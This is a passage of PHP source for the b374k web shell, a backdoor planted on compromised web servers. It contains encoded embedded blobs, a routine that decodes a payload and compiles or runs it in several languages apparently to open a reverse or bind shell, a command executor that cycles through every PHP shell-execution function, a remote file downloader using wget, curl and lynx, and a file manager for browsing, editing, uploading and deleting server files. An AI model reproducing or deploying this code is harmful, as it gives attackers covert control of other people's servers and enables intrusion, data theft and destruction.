94. $s_style = "rVbLjpswFP0VqqhSH4AgSTMzoH5Cl11VXRgwwRqwkTGdZBD/Xj/BgJNppbE3Drm+z3PP9ZehJJgFJWhQfU1+Zj1mvfeDYOJ3kKIyHTNSXIcM5M9nSnpcJLtIrlRe69ArTOJ9e0lzUhOa7Eq51J8vEJ0rlhy58FjRISO0gDSJ24vXkRoV3m4vVzqCwdw+y0PK4IUFBcwJBQwRnGCCIRdLKvIH0mFpamwpHFpQFAifk8h75L6MJaHNUKCurcE1QbhG4joDWQ09VvntkPe04yoKWIK+Zum4awDCiyBjudKgIa+BcjygoEB9l8QRt+D49IIKVvFj9DE13vC8KH92FQRcfpBxgRqdcVLDkqUNoGeEk2i6EU2yHiuGe39X8TBXYC8c4PnOnhELGAW4ExlIKGGAwU9BfAgPDwU8f1bx3BO4b9IDfggvLU8/rFHHVD08sK7IroG4d6XTaPdEZo4yMxR2vATDfyR6iyMDG1HnoFKoi09CdOuCdhXINTukgGOCPprChSJ0hEui0RuIsrlMa0UnS4mIUSiWnihNLKs7j9FB+7gXKeAZZCgHtcZFg4qi5mgNz+DKs23jXZuye+tB9JYUepfq15AxHmTXglxHwLWLYjZoUc79k9jpv3StQ+WKOd7Fcwd+jhv4iC8bgM+1VoFqkrHDPZzEvu3oW37O/48hwm3PXv2wpaRpmR+yCwMUAle3aKBHJoqMMEYaG32HJ7HvU7EFR25emR22GDJ+WDSmUXp4iORV5XnWs2Flb+H6k9hrZNyk/qn/JBkYbhkcXCrKFM0inHTcQ2IS4Px5M2/aus0Xrl5kpE1Xk2VWX22SuOgQZcHcPk0gm+5TB9DiR7E/oKYllAHMJ1PYwYbP5CuaxpkM00XToeApT045O4HLFjjdJVCtVuXaqH7U1RfKK5/HvfXYwUlK/u0aaMlqbw/HHGJOGjauv61xlou9ZpfTpuWtL1sXXGEv5kAczbFPUy6XS9Augi8lcmb7ZrjWwFGQN0r+JVeOxNvotQfPUnnOE8lTOj2T4ngmvWtGLu8zfm+n8bg0J6p9M9ajXGsG2QLeMx2JCUPlApTmktahH6xbYKxRq40cFvDXvnv72diMBa16DEtC2PKBR4VaG8IieY5pqDWtCGP9bPBV5vjJRtsoOfkXu7bwe17B/JmL/A7zrgvML++rV4MM1vKjPBkQqKeMfDmaJ5NosuWrOchqkj8vH1bLVgwobCFgnJb0yf6vJR2S3MyrdeOho5/iLUGy5d+OKJEHWDgic1sOpMeqi33NNrE5UP9Ng0vmHf8C";
95. $s_mime_types = "dZThdqMgEIX/7zn7DvMC2jZ62t3HmQgaGkepCDFvvxeNis32xx3huwMYmUkwSvcvRWMtIfz+Fbb5CeC0gsvp/Y1iSEARQZGAMoJyBZ9WN/Rpm7ADoUWNrEw+T7TIbmeJLemhgNCUu4EdH2EekLwh47Sd0DcN9fuBX95U19GIpq+RpN946FSudKXziyIfLlC4PHnSn02r4Un05cm3ca2Nnn3yXPRc9NyTN0+jFXV8pXDO63gmBimvw0hQiuJH8ENLMnmS0h8sl9mW74Nmdc9FK8O5vQeC0iyc7fP4kX3w8UUOWwQTekJY2U2fhWJYwZTVuBooAa0hKAXIaJMMibeZLhEeh95dmeQK51ooBJfYHe64axLgMnY1LZoOPPRngg7shneWbyQAhW9sAjvudgtg4cCWW+OQ/EDXmAxFZTTNMTFwjIvHsFemf2FlKyHEFZzZmYrYk+vUysQoQwg0D6480CBmM5dm4H2+tAC+HLoUioMCjYBnsWUtzcAUn85OK3aFELRNTXslhHW+1ek8RWlwLA8+2KYxI7fZzXTKke6Pawcm6IBGR9A3FJsPj4tKeesr3Y156E2lqQ029f5b2IzCPhzWeT1wjh/Q2vLP6yttox+SPsqPR1Ic/ZD0933dKY7SpMFYgla0dsr2SlPGjLvmKgGmRgGbWXNIvIprgnZQt1gew46StkmO2f4RCp9A1DKjlnk6MmHUfLLYdhk+a7tc+cBCww8mbsA3pkNx2j3hxmgr3up9EprkHw==";
96. $s_sortable_js = "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";
97.  
98.  
99. function swd($s_p){
100. global $s_self;
101. $s_ps = explode(DIRECTORY_SEPARATOR,$s_p);
102. $s_pu = "";
103. for($s_i = 0 ; $s_i < sizeof($s_ps)-1 ; $s_i++){
104. $s_pz = "";
105. for($s_j = 0 ; $s_j <= $s_i ; $s_j++) $s_pz .= $s_ps[$s_j].DIRECTORY_SEPARATOR;
106. $s_pu .= "<a href='".$s_self."cd=".$s_pz."' onclick='return false;'>".$s_ps[$s_i]." ".DIRECTORY_SEPARATOR." </a>";
107. }
108. return trim($s_pu);
109. }
110.  
111. function hss($s_t){
112. $s_n = array(">","<","\"");
113. $s_y = array("&gt;", "&lt;", "&quot;");
114. return str_replace($s_n,$s_y,$s_t);
115. }
116.  
117. function pf($f){
118. return "\"".$f."\"";
119. }
120.  
121. function rp($s_t){
122. return trim(str_replace("<br />","",$s_t));
123. }
124.  
125. function cs($s_t){
126. return str_replace(" ","_",$s_t);
127. }
128.  
129. function ss($s_t){
130. return (!get_magic_quotes_gpc())? trim(urldecode($s_t)) : trim(urldecode(stripslashes($s_t)));
131. }
132.  
133. function ssc($s_t){
134. return (!get_magic_quotes_gpc())? trim($s_t) : trim(stripslashes($s_t));
135. }
136.  
137. function rs($s_rstype,$s_rstarget,$s_rscode){
138. $s_result = "";
139. $s_fpath = "";
140. $s_fc = gzinflate(base64_decode($s_rscode));
141.  
142. $s_errperm = "Directory ".getcwd().DIRECTORY_SEPARATOR." is not writable, please change to a writable one";
143. $s_errgcc = "Unable to compile using gcc";
144. $s_errjavac = "Unable to compile using javac";
145.  
146. $s_split = explode("_",$s_rstype);
147. $s_method = $s_split[0];
148. $s_lang = $s_split[1];
149. if($s_lang=="py" || $s_lang=="pl" || $s_lang=="rb" || $s_lang=="js"){
150. if($s_lang=="py") $s_runlang = "python";
151. elseif($s_lang=="pl") $s_runlang = "perl";
152. elseif($s_lang=="rb") $s_runlang = "ruby";
153. elseif($s_lang=="js") $s_runlang = "node";
154. $s_fpath = "b374k_rs.".$s_lang;
155. if(is_file($s_fpath)) unlink($s_fpath);
156. if($s_file=fopen($s_fpath,"w")){
157. fwrite($s_file,$s_fc);
158. fclose($s_file);
159.  
160. if(is_file($s_fpath)){
161. $s_result = exe("chmod +x ".$s_fpath);
162. $s_result = exe($s_runlang." ".$s_fpath." ".$s_rstarget);
163. }
164. else $s_result = $s_errperm;
165. }
166. else $s_result = $s_errperm;
167. }
168. elseif($s_lang=="c"){
169. $s_fpath = "b374k_rs";
170. if(is_file($s_fpath)) unlink($s_fpath);
171. if(is_file($s_fpath.".c")) unlink($s_fpath.".c");
172. if($s_file=fopen($s_fpath.".c","w")){
173. fwrite($s_file,$s_fc);
174. fclose($s_file);
175. if(is_file($s_fpath.".c")){
176. $s_result = exe("gcc ".$s_fpath.".c -o ".$s_fpath);
177. if(is_file($s_fpath)){
178. $s_result = exe("chmod +x ".$s_fpath);
179. $s_result = exe("./".$s_fpath." ".$s_rstarget);
180. }
181. else $s_result = $s_errgcc;
182. }
183. else $s_result = $s_errperm;
184. }
185. else $s_result = $s_errperm;
186. }
187. elseif($s_lang=="win"){
188. $s_fpath = "b374k_rs.exe";
189. if(is_file($s_fpath)) unlink($s_fpath);
190. if($s_file=fopen($s_fpath,"w")){
191. fwrite($s_file,$s_fc);
192. fclose($s_file);
193.  
194. if(is_file($s_fpath)){
195. $s_result = exe($s_fpath." ".$s_rstarget);
196. }
197. else $s_result = $s_errperm;
198. }
199. else $s_result = $s_errperm;
200. }
201.  
202. elseif($s_lang=="java"){
203. $s_fpath = "b374k_rs";
204. if(is_file($s_fpath.".java")) unlink($s_fpath.".java");
205. if(is_file($s_fpath.".class")) unlink($s_fpath.".class");
206. if($s_file=fopen($s_fpath.".java","w")){
207. fwrite($s_file,$s_fc);
208. fclose($s_file);
209.  
210.  
211. if(is_file($s_fpath.".java")){
212. $s_result = exe("javac ".$s_fpath.".java");
213. if(is_file($s_fpath.".class")){
214. $s_result = exe("java ".$s_fpath." ".$s_rstarget);
215. }
216. else $s_result = $s_errjavac;
217. }
218. else $s_result = $s_errperm;
219. }
220. else $s_result = $s_errperm;
221. }
222. elseif($s_lang=="php"){
223. $s_result = eval("?>".$s_fc);
224. }
225. if(is_file($s_fpath)) unlink($s_fpath);
226. if(is_file($s_fpath.".c")) unlink($s_fpath.".c");
227. if(is_file($s_fpath.".java")) unlink($s_fpath.".java");
228. if(is_file($s_fpath.".class")) unlink($s_fpath.".class");
229. if(is_file($s_fpath."\$pt.class")) unlink($s_fpath."\$pt.class");
230. return $s_result;
231. }
232.  
233. function ts($s_s){
234. if($s_s<=0) return 0;
235. $s_w = array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
236. $s_e = floor(log($s_s)/log(1024));
237. return sprintf('%.2f '.$s_w[$s_e], ($s_s/pow(1024, floor($s_e))));
238. }
239.  
240. function gs($s_f){
241. $s_s = @filesize($s_f);
242. if($s_s !== false){
243. if($s_s<=0) return 0;
244. return ts($s_s);
245. }
246. else return "???";
247. }
248.  
249. function gp($s_f){
250. if($s_m=@fileperms($s_f)){
251. $s_p = 'u';
252. if(($s_m & 0xC000) == 0xC000)$s_p = 's';
253. elseif(($s_m & 0xA000) == 0xA000)$s_p = 'l';
254. elseif(($s_m & 0x8000) == 0x8000)$s_p = '-';
255. elseif(($s_m & 0x6000) == 0x6000)$s_p = 'b';
256. elseif(($s_m & 0x4000) == 0x4000)$s_p = 'd';
257. elseif(($s_m & 0x2000) == 0x2000)$s_p = 'c';
258. elseif(($s_m & 0x1000) == 0x1000)$s_p = 'p';
259. $s_p .= ($s_m & 00400) ? 'r' : '-';
260. $s_p .= ($s_m & 00200) ? 'w' : '-';
261. $s_p .= ($s_m & 00100) ? 'x' : '-';
262. $s_p .= ($s_m & 00040) ? 'r' : '-';
263. $s_p .= ($s_m & 00020) ? 'w' : '-';
264. $s_p .= ($s_m & 00010) ? 'x' : '-';
265. $s_p .= ($s_m & 00004) ? 'r' : '-';
266. $s_p .= ($s_m & 00002) ? 'w' : '-';
267. $s_p .= ($s_m & 00001) ? 'x' : '-';
268. return $s_p;
269. }
270. else return "???????????";
271. }
272.  
273. function exe($s_c){
274. $s_out = "";
275. $s_c = $s_c." 2>&1";
276.  
277. if(is_callable('system')) {
278. ob_start();
279. @system($s_c);
280. $s_out = ob_get_contents();
281. ob_end_clean();
282. if(!empty($s_out)) return $s_out;
283. }
284. if(is_callable('shell_exec')){
285. $s_out = @shell_exec($s_c);
286. if(!empty($s_out)) return $s_out;
287. }
288. if(is_callable('exec')) {
289. @exec($s_c,$s_r);
290. if(!empty($s_r)) foreach($s_r as $s_s) $s_out .= $s_s;
291. if(!empty($s_out)) return $s_out;
292. }
293. if(is_callable('passthru')) {
294. ob_start();
295. @passthru($s_c);
296. $s_out = ob_get_contents();
297. ob_end_clean();
298. if(!empty($s_out)) return $s_out;
299. }
300. if(is_callable('proc_open')) {
301. $s_descriptorspec = array(
302. 0 => array("pipe", "r"),
303. 1 => array("pipe", "w"),
304. 2 => array("pipe", "w")
305. );
306. $s_proc = @proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array());
307. if (is_resource($s_proc)) {
308. while ($s_si = fgets($s_pipes[1])) {
309. if(!empty($s_si)) $s_out .= $s_si;
310. }
311. while ($s_se = fgets($s_pipes[2])) {
312. if(!empty($s_se)) $s_out .= $s_se;
313. }
314. }
315. @proc_close($s_proc);
316. if(!empty($s_out)) return $s_out;
317. }
318. if(is_callable('popen')){
319. $s_f = @popen($s_c, 'r');
320. if($s_f){
321. while(!feof($s_f)){
322. $s_out .= fread($s_f, 2096);
323. }
324. pclose($s_f);
325. }
326. if(!empty($s_out)) return $s_out;
327. }
328. return "";
329. }
330.  
331. function cp($s_p){
332. if(is_dir($s_p)){
333. $s_x = DIRECTORY_SEPARATOR;
334. while(substr($s_p,-1) == $s_x) $s_p = rtrim($s_p,$s_x);
335. return $s_p.$s_x;
336. }
337. return $s_p;
338. }
339.  
340. function rmdirs($s_d){
341. $s_d = (substr($s_d,-1)=='/') ? $s_d:$s_d.'/';
342. $dh = opendir($s_d);
343. while(($item = readdir($dh))!==false) {
344. $item = $s_d.$item;
345.  
346. if((basename($item)=="..")||(basename($item)==".")) continue;
347. $type = filetype($item);
348. if($type == "dir") rmdirs($item);
349. else @unlink($item);
350. }
351. closedir($dh);
352. @rmdir($s_d);
353. }
354.  
355. function getallfiles($s_dir){
356. $s_f = glob($s_dir . '*');
357. for($s_i = 0; $s_i < count($s_f); $s_i++){
358.  
359. if(is_dir($s_f[$s_i])) {
360. $s_a = glob($s_f[$s_i].DIRECTORY_SEPARATOR.'*');
361. $s_f = array_merge($s_f, $s_a);
362. }
363. }
364. return $s_f;
365. }
366.  
367. function xwhich($s_pr){
368. $s_p = exe("which $s_pr");
369. if(trim($s_p)!="") {
370. return trim($s_p);
371. } else {
372. return trim($s_pr);
373. }
374. }
375.  
376. function dlfile($s_u,$s_p){
377. $s_n = basename($s_u);
378. if($s_t = @file_get_contents($s_u)){
379. if(is_file($s_p)) unlink($s_p);;
380. if($s_f=fopen($s_p,"w")){
381. fwrite($s_f,$s_t);
382. fclose($s_f);
383. if(is_file($s_p)) return true;
384. }
385. }
386.  
387. exe(xwhich('wget')." ".$s_u." -O ".$s_p);
388. if(is_file($s_p)) return true;
389.  
390. exe(xwhich('lwp-download')." ".$s_u." ".$s_p);
391. if(is_file($s_p)) return true;
392.  
393. exe(xwhich('lynx')." -source ".$s_u." > ".$s_p);
394. if(is_file($s_p)) return true;
395.  
396. exe(xwhich('curl')." ".$s_u." -o ".$s_p);
397. if(is_file($s_p)) return true;
398. return false;
399. }
400.  
401. function get_writabledir(){
402. if(is_writable(".")) $s_d = ".".DIRECTORY_SEPARATOR;
403. else{
404. if(!$s_d = getenv("TMP")) if(!$s_d = getenv("TEMP")) if(!$s_d = getenv("TMPDIR")){
405. if(is_writable("/tmp")) $s_d = "/tmp/";
406. else $s_d = getcwd().DIRECTORY_SEPARATOR;
407. }
408. }
409. return $s_d;
410. }
411.  
412. function zip($s_srcarr, $s_dest){
413. if(!extension_loaded('zip')) return false;
414. if(class_exists("ZipArchive")){
415. $s_zip = new ZipArchive();
416. if(!$s_zip->open($s_dest, 1)) return false;
417.  
418. if(!is_array($s_srcarr)) $s_srcarr = array($s_srcarr);
419. foreach($s_srcarr as $s_src){
420. $s_src = str_replace('\\', '/', $s_src);
421. if(is_dir($s_src)){
422. $s_files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($s_src), 1);
423. foreach($s_files as $s_file){
424. $s_file = str_replace('\\', '/', $s_file);
425. if(in_array(substr($s_file, strrpos($s_file, '/')+1), array('.', '..'))) continue;
426. if (is_dir($s_file) === true) $s_zip->addEmptyDir(str_replace($s_src . '/', '', $s_file . '/'));
427. else if (is_file($s_file) === true) $s_zip->addFromString(str_replace($s_src . '/', '', $s_file), @file_get_contents($s_file));
428. }
429. }
430. elseif(is_file($s_src) === true) $s_zip->addFromString(basename($s_src), @file_get_contents($s_src));
431. }
432. $s_zip->close();
433. return true;
434. }
435. }
436.  
437. function check_access($s_lang){
438. $s_s = 0;
439. switch($s_lang){
440. case "python":
441. $s_cek = strtolower(exe("python -h"));
442. if(strpos($s_cek,"usage")!==false) $s_s = 1;
443. break;
444. case "perl":
445. $s_cek = strtolower(exe("perl -h"));
446. if(strpos($s_cek,"usage")!==false) $s_s = 1;
447. break;
448. case "ruby":
449. $s_cek = strtolower(exe("ruby -h"));
450. if(strpos($s_cek,"usage")!==false) $s_s = 1;
451. break;
452. case "node":
453. $s_cek = strtolower(exe("node -h"));
454. if(strpos($s_cek,"usage")!==false) $s_s = 1;
455. break;
456. case "gcc":
457. $s_cek = strtolower(exe("gcc --help"));
458. if(strpos($s_cek,"usage")!==false) $s_s = 1;
459. break;
460. case "tar":
461. $s_cek = strtolower(exe("tar --help"));
462. if(strpos($s_cek,"usage")!==false) $s_s = 1;
463. break;
464. case "java":
465. $s_cek = strtolower(exe("javac --help"));
466. if(strpos($s_cek,"usage")!==false){
467. $s_cek = strtolower(exe("java -h"));
468. if(strpos($s_cek,"usage")!==false) $s_s = 1;
469. }
470. break;
471. }
472. return $s_s;
473. }
474. // find available archiver
475. function get_archiver_available(){
476. global $s_self, $s_tar;
477. $s_dlfile = "";
478. $s_avail_arc = array("raw" => "raw");
479.  
480. if(class_exists("ZipArchive")){
481. $s_avail_arc["ziparchive"] = "zip";
482. }
483. if($s_tar){
484. $s_avail_arc["tar"] = "tar";
485. $s_avail_arc["targz"] = "tar.gz";
486. }
487.  
488. $s_option_arc = "";
489. foreach($s_avail_arc as $s_t => $s_u){
490. $s_option_arc .= "<option value=\"".$s_t."\">".$s_u."</option>";
491. }
492.  
493. $s_dlfile .= "<form action='".$s_self."' method='post'>
494. <select onchange='download(this);' name='dltype' class='inputzbut' style='width:80px;height:20px;'>
495. <option value='' disabled selected>Download</option>
496. ".$s_option_arc."
497. </select>
498. <input type='hidden' name='dlpath' value='__dlpath__' />
499. </form>
500. ";
501. return $s_dlfile;
502. }
503. // explorer, return a table of given dir
504. function showdir($s_cwd){
505. global $s_self,$s_tar;
506.  
507. $s_posix = (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))? true : false;
508. $s_win = (strtolower(substr(php_uname(),0,3)) == "win")? true : false;
509.  
510. $s_fname = array();
511. $s_dname = array();
512. $s_total_file = 0;
513. $s_total_dir = 0;
514.  
515. if(function_exists("scandir") && $s_dh = @scandir($s_cwd)){
516. foreach($s_dh as $s_file){
517. if(is_dir($s_file)) $s_dname[] = $s_file;
518. elseif(is_file($s_file)) $s_fname[] = $s_file;
519. }
520. }
521. else{
522. if($s_dh = @opendir($s_cwd)){
523. while($s_file = readdir($s_dh)){
524. if(is_dir($s_file)) $s_dname[] = $s_file;
525. elseif(is_file($s_file))$s_fname[] = $s_file;
526. }
527. closedir($s_dh);
528. }
529. }
530.  
531. natcasesort($s_fname);
532. natcasesort($s_dname);
533. $s_list = array_merge($s_dname,$s_fname);
534.  
535. if($s_win){
536. //check if this root directory
537. chdir("..");
538. if(cp(getcwd())==cp($s_cwd)){
539. array_unshift($s_list, ".");
540. }
541. chdir($s_cwd);
542. }
543.  
544. $s_path = explode(DIRECTORY_SEPARATOR,$s_cwd);
545. $s_tree = sizeof($s_path);
546.  
547. $s_parent = "";
548. if($s_tree > 2) for($s_i=0;$s_i<$s_tree-2;$s_i++) $s_parent .= $s_path[$s_i].DIRECTORY_SEPARATOR;
549. else $s_parent = $s_cwd;
550.  
551. $s_owner_html = (!$s_win && $s_posix) ? "<th style='width:140px;min-width:140px;'>owner:group</th>" : "";
552. $s_colspan = (!$s_win && $s_posix) ? "6" : "5";
553. $s_buff = "
554. <table class='explore sortable'>
555. <tr><th style='width:24px;min-width:24px;' class='sorttable_nosort'></th><th style='min-width:150px;'>name</th><th style='width:74px;min-width:74px;'>size</th>".$s_owner_html."<th style='width:80px;min-width:80px;'>perms</th><th style='width:150px;min-width:150px;'>modified</th><th style='width:190px;min-width:190px;' class='sorttable_nosort'>action</th><th style='width:90px;min-width:90px;' class='sorttable_nosort'>download</th></tr>
556. ";
557.  
558. $s_arc = get_archiver_available();
559. foreach($s_list as $s_l){
560. if(!$s_win && $s_posix){
561. $s_name = posix_getpwuid(fileowner($s_l));
562. $s_group = posix_getgrgid(filegroup($s_l));
563. $s_owner = $s_name['name']."<span class='gaya'>:</span>".$s_group['name'];
564. $s_owner_html = "<td style='text-align:center;'>".$s_owner."</td>";
565. }
566.  
567. $s_lhref = "";
568. $s_lname = "";
569. $s_laction = "";
570. if(is_dir($s_l)){
571. if($s_l=="."){
572. $s_lhref = $s_self."cd=".$s_cwd;
573. $s_lsize = "LINK";
574. $s_laction = "
575. <span id='titik1'>
576. <a href='".$s_self."cd=".$s_cwd."&find=".$s_cwd."' title='find something' onclick='return false;'>find</a> |
577. <a href='".$s_self."cd=".$s_cwd."&x=upload' title='upload' onclick='return false;'>upl</a> |
578. <a href='".$s_self."cd=".$s_cwd."&edit=".$s_cwd."newfile_1&new=yes' title='create new file' onclick='return false;'>+file</a> |
579. <a href=\"javascript:tukar('titik1','titik1_form');\" title='create new directory'>+dir</a>
580. </span>
581. <div id='titik1_form' class='sembunyi'>
582. <form action='".$s_self."' method='post'>
583. <input type='hidden' name='cd' value='".$s_cwd."' />
584. <input class='inputz' id='titik1_' style='width:80px;' type='text' name='mkdir' value='newfolder_1' />
585. <input class='inputzbut' type='submit' name='rename' style='width:35px;' value='Go !' />
586. </form>
587. <input class='inputzbut' type='button' value='x' onclick=\"tukar('titik1_form','titik1');\" />
588. </div>";
589. }
590. elseif($s_l==".."){
591. $s_lhref = $s_self."cd=".$s_parent;
592. $s_lsize = "LINK";
593. $s_laction = "
594. <span id='titik2'>
595. <a href='".$s_self."cd=".$s_parent."&find=".$s_parent."' title='find something' onclick='return false;'>find</a> |
596. <a href='".$s_self."cd=".$s_parent."&x=upload' title='upload' onclick='return false;'>upl</a> |
597. <a href='".$s_self."cd=".$s_parent."&edit=".$s_parent."newfile_1&new=yes' title='create new file' onclick='return false;'>+file</a> |
598. <a href=\"javascript:tukar('titik2','titik2_form');\" title='create new directory'>+dir</a>
599. </span>
600. <div id='titik2_form' class='sembunyi'>
601. <form action='".$s_self."' method='post'>
602. <input type='hidden' name='cd' value='".$s_parent."' />
603. <input class='inputz' id='titik2_' style='width:80px;' type='text' name='mkdir' value='newfolder_1' />
604. <input class='inputzbut' type='submit' name='rename' style='width:35px;' value='Go !' />
605. </form>
606. <input class='inputzbut' type='button' value='x' onclick=\"tukar('titik2_form','titik2');\" />
607. </div>";
608. }
609. else{
610. $s_lhref = $s_self."cd=".$s_cwd.$s_l.DIRECTORY_SEPARATOR;
611. $s_lsize = "DIR";
612. $s_laction = "
613. <span id='".cs($s_l)."_link'>
614. <a href='".$s_self."cd=".$s_cwd.$s_l.DIRECTORY_SEPARATOR."&find=".$s_cwd.$s_l.DIRECTORY_SEPARATOR."' title='find something' onclick='return false;'>find</a> |
615. <a href='".$s_self."cd=".$s_cwd.$s_l.DIRECTORY_SEPARATOR."&x=upload' title='upload' onclick='return false;'>upl</a> |
616. <a href=\"javascript:tukar('".cs($s_l)."_link','".cs($s_l)."_form');\" title='rename'>ren</a> |
617. <a href='".$s_self."cd=".$s_cwd."&del=".$s_l."' title='delete' onclick='return false;'>del</a>
618. </span>
619. <div id='".cs($s_l)."_form' class='sembunyi'>
620. <form action='".$s_self."' method='post'>
621. <input type='hidden' name='oldname' value='".$s_l."' />
622. <input type='hidden' name='cd' value='".$s_cwd."' />
623. <input class='inputz' style='width:80px;' type='text' id='".cs($s_l)."_link_' name='newname' value='".$s_l."' />
624. <input class='inputzbut' type='submit' name='rename' value='ren' />
625. </form>
626. <input class='inputzbut' type='button' value='x' onclick=\"tukar('".cs($s_l)."_form','".cs($s_l)."_link');\" />
627. </div>";
628. $s_total_dir++;
629. }
630. $s_lname = "[ ".$s_l." ]";
631. $s_lsizetit = "0";
632. $s_lnametit = "dir : ".$s_l;
633. }
634. else{
635. $s_lhref = $s_self."view=".$s_cwd.$s_l;
636. $s_lname = $s_l;
637. $s_lsize = gs($s_l);
638. $s_lsizetit = @filesize($s_l);
639. $s_lnametit = "file : ".$s_l;
640. $s_laction = "
641. <div id='".cs($s_l)."_form' class='sembunyi'>
642. <form action='".$s_self."' method='post'>
643. <input type='hidden' name='oldname' value='".$s_l."' />
644. <input class='inputz' style='width:80px;' type='text' id='".cs($s_l)."_link_' name='newname' value='".$s_l."' />
645. <input class='inputzbut' type='submit' name='rename' value='ren' />
646. </form>
647. <input class='inputzbut' type='button' value='x' onclick=\"tukar('".cs($s_l)."_form','".cs($s_l)."_link');\" />
648. </div>
649. <span id='".cs($s_l)."_link'>
650. <a href='".$s_self."edit=".$s_cwd.$s_l."' title='edit' onclick='return false;'>edit</a> |
651. <a href='".$s_self."hexedit=".$s_cwd.$s_l."' title='edit as hex' onclick='return false;'>hex</a> |
652. <a href=\"javascript:tukar('".cs($s_l)."_link','".cs($s_l)."_form');\" title='rename'>ren</a> |
653. <a href='".$s_self."del=".$s_cwd.$s_l."' title='delete' onclick='return false;'>del</a>
654. </span>";
655. $s_total_file++;
656. }
657.  
658. if(($s_l!='.')&&($s_l!='..')){
659. $s_cboxes = "<input id='".md5($s_lhref)."' name='cbox' value='".$s_cwd.$s_l."' type='checkbox' class='css-checkbox' onchange='hilite(this);' />
